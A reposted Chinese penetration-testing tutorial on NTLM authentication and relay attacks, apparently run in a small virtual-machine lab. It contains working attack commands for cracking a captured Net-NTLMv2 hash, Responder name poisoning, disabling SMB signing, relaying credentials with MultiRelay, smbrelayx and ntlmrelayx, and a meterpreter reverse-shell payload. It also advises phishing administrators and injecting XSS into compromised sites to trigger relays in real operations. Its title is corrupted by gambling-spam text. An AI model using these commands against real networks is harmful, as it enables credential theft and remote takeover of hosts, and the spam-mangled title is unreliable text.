ntlm网络认证及ntlm-ag真人国际厅网站

windows认证分为本地认证和网络认证,当我们开机登录用户账户时,就需要将lsass.exe进程转换的明文密码hash与 sam文件进行比对,这种方式即为——本地认证

而当我们访问同一局域网的一台主机上的smb共享时,需要提供凭证通过验证才能访问,这个过程就会设计windows的网络认证。

ntlm协议

ntlm协议的认证共需要三个步骤完成:协商、挑战、认证。也叫挑战响应机制

  • 协商,这个是为了解决历史遗留问题,也就是为了向下兼容,双方先确定一下传输协议的版本等各种信息。版本主要分为两种:ntlmv1与ntlm v2
  • 挑战,下面会介绍。
  • 验证,对质询的最后结果进行一个验证,验证通过后,即允许访问资源

ntlmv1、ntlm v2区别

不同点

  • ntlm v1的challenge有8位,ntlm v2的challenge为16位
  • ntlm v1的主要加密算法是des,ntlm v2的主要加密算法是hmac-md5。

共同点

  • 都是通过ntlm hash进行的加密

挑战的完整过程

工作组中

  1. client向server发送用户信息(即用户名)请求
  2. server接受到请求后,判断本地用户列表是否存在client发送的用户名,如果没有返回认证失败,如果有,生成一个16位的随机数即challenge, 然后使用登录用户名对应的ntlm hash加密challenge, 生成challenge1保存在内存中。同时,生成challenge1后,将challenge发送给client。
  3. 当client接收到chalenge时,将发送的用户名所对应的ntlm hash对chalenge进行加密即response(net-ntlm-hash),并response发送给server。
  4. 接着就是验证过程了,server在收到response后,将其与chalenge1进行比对,如果相同,则验证成功

域环境中

  1. 由于域机器sam文件中不存在域用户的ntlm hash,所以服务器将客户端用户名、challenge、response通过 netlogon协议交到域控手中,让域控对其进行身份验证。
  2. 域控通过客户端用户名在自己的ntds.dit中找到对应的ntlm-hash,用challenge对其进行加密,再与net-ntlm-hash进行对比。如果相同则表示用户拥有的密码是正确的,否则则验证失败,dc将结果返回给服务器。
  3. 服务器根据dc的结果成功与否返回给客户端。

wirshark抓包分析

1、模拟client访问server的共享


2、抓包看下共享产生的smb协议,其中negotiate protocol responss就是进行协商的过程


3、服务器向客户端返回16位长的challenge


4、接着客户端将发送的用户名所对应的ntlm hash对chalenge进行加密得到response


5、将获取到的response进行net-ntlmhash格式的拼接

net-ntlmhash格式:

username::domain:challenge:hmac-md5:blob 

username、domain即为:

challenge就是第二步中获取的内容:

7f3085e50542ee4d 

hmac-md5即为ntproofstr的内容:


blob就是response中除ntproofstr剩下的部分:

01010000000000005da4077f4b10d901d3c521d6bddc4ce50000000002001200530045004e00540049004d0045004e00540001001000570049004e00300038002d005000430004001a00730065006e00740069006d0065006e0074002e0063006f006d0003002c00570069006e00300038002d00700063002e00730065006e00740069006d0065006e0074002e0063006f006d0005001a00730065006e00740069006d0065006e0074002e0063006f006d00070008005da4077f4b10d901060004000200000008003000300000000000000000000000002000003b6ad2d6ec858ee23b79e3ddde29d57c3479fca6042d38c984b242c2b44d1e7f0a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00350032002e00310037003100000000000000000000000000 

所以拼接好的net-ntlmhash为:

test::sentiment:7f3085e50542ee4d:4d11723d0631436ee007f9bdb1ce3a45:01010000000000005da4077f4b10d901d3c521d6bddc4ce50000000002001200530045004e00540049004d0045004e00540001001000570049004e00300038002d005000430004001a00730065006e00740069006d0065006e0074002e0063006f006d0003002c00570069006e00300038002d00700063002e00730065006e00740069006d0065006e0074002e0063006f006d0005001a00730065006e00740069006d0065006e0074002e0063006f006d00070008005da4077f4b10d901060004000200000008003000300000000000000000000000002000003b6ad2d6ec858ee23b79e3ddde29d57c3479fca6042d38c984b242c2b44d1e7f0a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00350032002e00310037003100000000000000000000000000 

hashcat爆破

  • -m:hash的类型,5600对应netntlmv2,具体可参考:
  • -o:输出文件
  • 字典文件为password.txt
  • –force 强制执行,测试系统不支持intel opencl
hashcat -m 5600 test::sentiment:7f3085e50542ee4d:4d11723d0631436ee007f9bdb1ce3a45:01010000000000005da4077f4b10d901d3c521d6bddc4ce50000000002001200530045004e00540049004d0045004e00540001001000570049004e00300038002d005000430004001a00730065006e00740069006d0065006e0074002e0063006f006d0003002c00570069006e00300038002d00700063002e00730065006e00740069006d0065006e0074002e0063006f006d0005001a00730065006e00740069006d0065006e0074002e0063006f006d00070008005da4077f4b10d901060004000200000008003000300000000000000000000000002000003b6ad2d6ec858ee23b79e3ddde29d57c3479fca6042d38c984b242c2b44d1e7f0a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00350032002e00310037003100000000000000000000000000 password.txt -o result.txt --force 

responder

下载地址:

前置知识

windows系统名称解析顺序
当我们访问一个共享时 net use \aaa,其寻找这个主机名称会遵循以下的步骤:

  1. 本地hosts文件(%windir%\system32\drivers\etc\hosts)
  2. dns缓存/dns服务器
  3. 链路本地多播名称解析(llmnr)和netbios名称服务(nbt-ns)

如果没有在1、2项中找到对应名称,系统就会通过链路本地多播名称解析(llmnr)和net-bios名称服务(nbt-ns)在本地进行名称解析。这时,客户端就会将未经认证的udp广播到网络中,询问它是否为本地系统的名称,由于该过程未被认证,并且广播到整个网络,从而允许网络 上的任何机器响应并声称是这台机器。

因此当用户输入不存在、包含错误或者dns中 没有的主机名时,通过responder工具监听llmnr和netbios广播,就可以伪装成受害者要访问的这台机器,并从而让受害者交出相应的登陆凭证。核心过程与arp欺骗类似,我们可以让攻击者作中间人,截获到客户端的net-ntlm hash。

获取net-ntlmhash

监听kali的eth1网卡

sudo responder -i eth1 -fv 

同网段主机访问任意不存在用户


本地和缓存查询不到sfss时,内网主机就会将未经认证的udp广播到网络中,询问谁是sfss,由于该过程未被认证,并且广播到整个网络,从而允许网络 上的任何机器响应并声称自己是sfss。此时kali伪装成sfss这台机器,接着进行ntlm认证。从而让受害者交出相应的登陆凭证(net-ntlmhash)


之后就可以用hashcat进行爆破了

上边获取到net-ntlmhash后对密码进行了爆破,但若我们爆破不出密码呢?这时就可以使用ntlm-relay攻击,也叫ntlm重放攻击。

原理


重放本身的含义就是:攻击者利用网络监听或者其他方式盗取认证凭据,之后再把它重新发给认证服务器。

因此ntlm重放攻击也就是将窃听到的客户端net-ntlmhash,重放到服务端。而由于攻击者拥有了该凭证,因此服务端自然而然就认为攻击者就是客户端。如果这个凭据权限足够,那么就可以控制域内其它主机,所以凭据的权限很重要。这里攻击者其实就充当了一个中间人的身份。

responder

攻击前提

ntlm relay攻击时在域中通过relay到smb服务将管理组成员冲放到到一些敏感的机器上。

因此relay到smb服务要求被攻击机器不能开启smb签名,域内主机的 smb 签名默认关闭,但域控是默认开启的。

实验环境

虚拟机 ip
kali 192.168.52.199
win2012(域控) 192.168.52.163
win2016(域管理员登录) 192.168.52.198
win2008(受害机) 192.168.52.171

1、先用runfinger.py来查看下内网中开放的信息,可以看到163域控是开启了smb签名的,其他主机没有

python runfinger.py -i 192.168.52.0/24 


若域内其他主机开启了smb signing,可通过命令关闭对应服务( windows server系列中requiresecuritysignature子键默认值为1)

reg add hklm\system\currentcontrolset\services\lanmanserver\parameters /v requiresecuritysignature /t reg_dword /d 0 /f 

2、修改responder的配置文件responder.conf,不让其对 hash 进行抓取。将smb和http的on改为off:

sudo vim /usr/share/responder/responder.conf 


3、开启responder监听

responder -i eth1 

4、启动multirelay.py

cd /usr/share/responder/tools python3 multirelay.py -t 要攻击的域内目标 -u all python3 multirelay.py -t 192.168.52.171 -u all 

5、由于需要高权限凭证,因此在win16上用域管理员权限登录


6、返回了win08的shell

impacket

impacket也有对应的exp

smbrelayx.py

1、在kali上执行如下命令监听 80 和 445 端口,伪造 http 和 smb 服务:

#smbrelay 攻击 192.168.52.171 主机,并执行 whoami 命令 python3 smbrelayx.py -h 192.168.52.171 -c whoami 

2、通过owa钓鱼或者其他手段诱导域管理员或其它拥有域管账号密码的域用户访问访问 :


3、这时就成功执行whoami命令,获取到了win08的system权限


4、利用该思路可以尝试上线到c2,先生成一个木马

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.52.163 lport=4444 -f exe -o shell.exe #启动监听 use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.52.199 set lport 4444 run 

5、smbrelayx.py开始重放攻击,-e是要执行的文件

python3 smbrelayx.py -h 192.168.52.171 -e shell.exe 

6、重复步骤2的操作,成功返回会话


7、但该会话很快就会被删除


因此应尽快做好进程迁移

run post/windows/manage/migrate 

ntlmrelayx.py

与上述方式一样还可以用ntlmrelayx.py

python3 ntlmrelayx.py -t smb://192.168.52.171 -c whoami 

除邮件钓鱼外,通过共享也可

扩展

其实相对于impacket中的方法,reponder的更实用一些,因为impacket中的方法需要连接kali,在实战中有些鸡肋。。。

而reponder中,直接通过net use的一个不存在用户的方法,也不太会发生,因此可以通过另一种方式让目标机器加载net use

因为在渗透前一定是拿到了一定权限的,那就可以通过在目标index界面中插入一条xss语句,当有管理员身份的用户访问时,便可触发重放攻击

原文链接:https://xz.aliyun.com/t/12627

网络摘文,本文作者:15h,如若转载,请注明出处:https://www.15cov.cn/2023/08/27/ntlm网络认证及ntlm-relay攻击/

发表评论

邮箱地址不会被公开。 必填项已用*标注

网站地图